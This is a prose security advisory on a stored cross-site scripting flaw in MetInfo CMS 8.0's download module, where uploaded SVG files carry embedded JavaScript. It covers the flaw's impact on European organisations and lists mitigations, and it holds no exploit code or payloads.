CVE-2025-60452 is a stored Cross-Site Scripting (XSS) vulnerability identified in MetInfo CMS version 8.0, specifically within the download management module located at app\system\download\admin\download_admin.class.php. This vulnerability arises because the system allows attackers to upload malicious SVG (Scalable Vector Graphics) files that contain embedded JavaScript code. When these SVG files are subsequently viewed or accessed by users through the CMS interface, the embedded JavaScript executes in the context of the victim's browser. Stored XSS vulnerabilities are particularly dangerous because the malicious payload is saved on the server and served to multiple users, potentially affecting a wide audience. The attack vector here leverages the SVG file format, which supports embedded scripts, to bypass typical file upload restrictions that might block executable scripts but allow images. This vulnerability does not require user interaction beyond viewing or accessing the infected file, and it can lead to session hijacking, credential theft, defacement, or further exploitation of the victim's browser environment. No CVSS score has been assigned yet, and there are no known exploits in the wild at the time of publication. The affected version is MetInfo CMS 8.0, a content management system used for website administration and content delivery.

For European organizations using MetInfo CMS version 8.0, this vulnerability poses a significant risk to the confidentiality and integrity of their web applications and user data. Attackers exploiting this flaw could execute arbitrary JavaScript in the browsers of site visitors or administrators, potentially leading to theft of session cookies, user credentials, or other sensitive information. This could result in unauthorized access to administrative functions or user accounts, data leakage, and reputational damage. Additionally, the ability to inject persistent malicious scripts could facilitate phishing attacks or malware distribution to site visitors. The impact is heightened for organizations that rely on MetInfo CMS for critical business operations or handle sensitive personal data under GDPR regulations, as exploitation could lead to compliance violations and financial penalties. The availability impact is generally low for XSS vulnerabilities, but indirect effects such as site defacement or user trust erosion could affect business continuity. Since the vulnerability involves file uploads, attackers with limited privileges might exploit it, increasing the attack surface. The lack of a patch or mitigation at the time of disclosure further elevates the risk for European entities until updates or workarounds are implemented.

European organizations should immediately review and restrict file upload functionalities within MetInfo CMS, especially in the download management module. Specific mitigations include: 1) Implement strict server-side validation to block SVG files containing scripts or disallow SVG uploads entirely if not necessary. 2) Sanitize and validate all uploaded files to ensure they do not contain embedded JavaScript or other executable content. 3) Employ Content Security Policy (CSP) headers to restrict script execution sources and mitigate the impact of any injected scripts. 4) Limit user permissions to upload files only to trusted administrators and monitor upload logs for suspicious activity. 5) Regularly audit and update the CMS to the latest versions once patches become available. 6) Educate administrators and users about the risks of interacting with untrusted uploaded content. 7) Consider implementing web application firewalls (WAF) with rules to detect and block XSS payloads in file uploads and HTTP requests. These steps go beyond generic advice by focusing on the specific vector (malicious SVG uploads) and the affected module, helping to reduce the attack surface until an official patch is released.